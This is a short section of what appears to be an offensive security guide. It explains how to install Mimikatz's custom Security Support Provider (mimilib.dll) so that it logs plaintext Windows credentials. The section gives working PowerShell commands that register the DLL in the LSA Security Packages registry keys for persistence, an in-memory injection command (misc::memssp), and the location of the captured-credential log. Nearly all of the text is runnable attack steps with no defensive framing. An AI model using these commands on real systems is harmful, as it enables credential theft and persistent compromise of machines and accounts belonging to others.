8.6 - Custom SSP
Custom SSP
A Security Support Provider (SSP) is a DLL that allows applications to establish authenticated connections. Common Microsoft SSPs include:
NTLM
Kerberos
Wdigest
CredSSP
Mimikatz provides a custom SSP (
mimilib.dll) that logs plaintext credentials (including local, service, and machine accounts) on the targeted machine.
Installation Methods:
1. Registry Injection Method (Persistent):
Drop the mimilib.dll into C:\Windows\System32\ and register it via the Registry:
# Append 'mimilib' to the list of registered security packages
$packages = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\' -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$packages += "mimilib"
# Update registry entries
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\' -Name 'Security Packages' -Value $packages
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\' -Name 'Security Packages' -Value $packages2. In-Memory Injection (Less Stable, especially on Server 2019/2022):
Invoke-Mimikatz -Command '"misc::memssp"'All captured credentials will be logged in:
C:\Windows\System32\mimilsa.logLast updated